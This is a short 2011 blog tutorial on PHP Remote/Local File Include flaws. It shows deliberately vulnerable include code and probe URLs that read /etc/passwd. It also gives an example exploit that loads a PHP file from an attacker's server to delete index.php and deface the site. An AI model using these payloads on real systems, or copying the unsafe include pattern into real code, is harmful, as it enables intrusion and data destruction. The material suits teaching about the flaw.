Tuesday, February 15, 2011

What is RFI/LFI (Remote/Local File Include)

Description
This vulnerability allows the user to include a remote or local file, and have it parsed and executed on the local server.Example Vulnerable Code - index.php (PHP)


PHP Code:
$page $_GET['p'];
if (isset(
$page)) {
    include(
$page);
} else {
    include(
"home.php");
}
?>

Testing Inputs For Vulnerability
Try visiting "index.php?p=http://www.google.com/"; if you see Google, it is vulnerable to RFI and consequently LFI. If you don't it's not vulnerable to RFI, but still may be vulnerable to LFI. Assuming the server is running *nix, try viewing "index.php?p=/etc/passwd"; if you see the passwd file, it's vulnerable to LFI; else, it's not vulnerable to RFI or LFI.
Example Exploit
Let's say the target is vulnerable to RFI and we upload the following PHP code to our server

PHP Code:
unlink("index.php");system("echo Hacked > index.php");?>
and then we view "index.php?p=http://our.site.com/malicious.php" then our malicious code will be run on their server, and by doing so, their site will simply say 'Hacked' now.

0 comments:

Post a Comment